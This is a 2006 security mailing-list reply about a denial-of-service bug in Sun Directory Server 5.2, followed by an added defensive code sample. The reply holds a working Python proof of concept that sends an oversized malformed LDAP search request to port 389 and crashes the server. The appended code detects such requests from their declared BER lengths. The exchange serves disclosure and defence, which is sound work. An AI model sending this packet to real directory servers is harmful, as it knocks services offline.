Re: [Dailydave] ??? Sun Directory Server 5.2 fun ???
From: Evgeny Legerov (admin gleg.net)
Date: Fri Feb 10 2006 - 08:53:52 CST
Hi,
> payothl free.fr wrote:
> Hi Evgeny,
>
> I tried your "ProtoVer LDAP" on the last DS5.2Patch4 but without
> success.
>
> It appears from the error message that the Directory Server shut
> itself down after trying to allocate 1.6GB of memory after receiving
> a 40K request from a client. From the sample packet provided, it was
> a subtree search request with a base DN of
> "dc={40,000 plus signs},dc=example,dc=com" with a filter of
> "(foo=*)". The search base DN is technically malformed, but even if
> that's the case, then it is no excuse for causing the Directory
> Server to allocate an excessive amount of memory and shut itself
> down.
>
> However, I have tested this issue on both Solaris and Linux and have
> been unable to reproduce it. I am sending exactly the same request
> as contained in the e-mail message describing the problem, but I
> can't seem to make the server try to allocate a significant amount
> of memory, shut down, or become unresponsive in any way. I will say
> that behavior of the Directory Server is not entirely correct in
> that it never sends a response to the client, but it will eventually
> terminate the client connection. It appears that the length of time
> before the server closes the connection to the client is equal to
> two times the configured value of the nsslapd-ioblocktimeout
> attribute.
>
> There is a legitimate way to exploit this problem that I haven't
> discovered yet.
> I think that there is a little bit more configuration required
> before this can be exercised.
>
> If you can reproduce this problem for yourself and provide me with
> the details regarding how you were able to do so, I will appreciate
> it.
>
> Guillaume
Try the following simple code:
"""
from socket import *
s="\x30\x82\xea\x8b\x02\x01\x01\x63\x82\xea\x84\x04\x82\xea\x60"
s+="\x2b"*60000
s+="\x41\x01\x02\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b"
s+="\x6f\x62\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00"
sock=socket(AF_INET, SOCK_STREAM)
sock.connect(("localhost",389))
sock.sendall(s)
"""
In my testing (default install of SD 5.2), the server
prints the following message and exits:
...
Memory allocation error calloc of 3600420010 bytes failed; errno 12
...
Also you could try ProtoVer Sample LDAP testsuite
(http://www.gleg.net/protover_ldap_sample.shtml) which is
known to reproduce this particular problem.
Best regards,
Evgeny Legerov
CEO, GLEG Ltd.
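
Added example, not part of the original message and not code from GLEG or Sun: a pre-parse check that a proxy or IDS could apply to the declared BER lengths of an LDAP search request, flagging the 60,000-byte base DN declared in the packet above. `MAX_BASE_DN`, the verdict strings and the function names are assumptions chosen for illustration.

```python
# Added example: pre-parse guard on the declared base DN length of an LDAP search.
MAX_BASE_DN = 4096  # assumed policy limit, not a Directory Server setting

def read_tlv_header(buf, pos):
    """Return (tag, declared_length, value_offset) for the BER TLV at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short form: length is in this octet
        return tag, first, pos
    n = first & 0x7F                      # long form: n length octets follow
    if n == 0 or n > 4:
        raise ValueError("indefinite or oversized length field")
    if pos + n > len(buf):
        raise ValueError("truncated length field")
    return tag, int.from_bytes(buf[pos:pos + n], "big"), pos + n

def check_search_request(buf, max_base_dn=MAX_BASE_DN):
    """Classify an LDAPMessage from its leading bytes: (verdict, base_dn_len)."""
    tag, msg_len, pos = read_tlv_header(buf, 0)
    if tag != 0x30:                       # LDAPMessage is a SEQUENCE
        return "not-ldap", None
    tag, id_len, pos = read_tlv_header(buf, pos)
    if tag != 0x02:                       # messageID INTEGER
        return "not-ldap", None
    op_tag, op_len, pos = read_tlv_header(buf, pos + id_len)
    if op_tag != 0x63:                    # [APPLICATION 3] SearchRequest
        return "other-op", None
    dn_tag, dn_len, _ = read_tlv_header(buf, pos)
    if dn_tag != 0x04 or dn_len > op_len or op_len > msg_len:
        return "malformed", None
    if dn_len > max_base_dn:
        return "reject-oversized-dn", dn_len
    return "ok", dn_len

# Leading 15 bytes of the request posted in this message (headers only).
REPORTED_HEADER = bytes.fromhex("3082ea8b0201016382ea840482ea60")
# Constructed sample: ordinary subtree search under dc=example,dc=com.
BENIGN = (bytes.fromhex("303602010163310411") + b"dc=example,dc=com"
          + bytes.fromhex("0a01020a0100020100020100010100870b")
          + b"objectClass" + bytes.fromhex("3000"))

if __name__ == "__main__":
    for name, pkt in (("reported", REPORTED_HEADER), ("benign", BENIGN)):
        print(name, check_search_request(pkt))
```

Because it reads only the declared BER lengths, the check can run on the first few bytes of a connection before the request body is buffered.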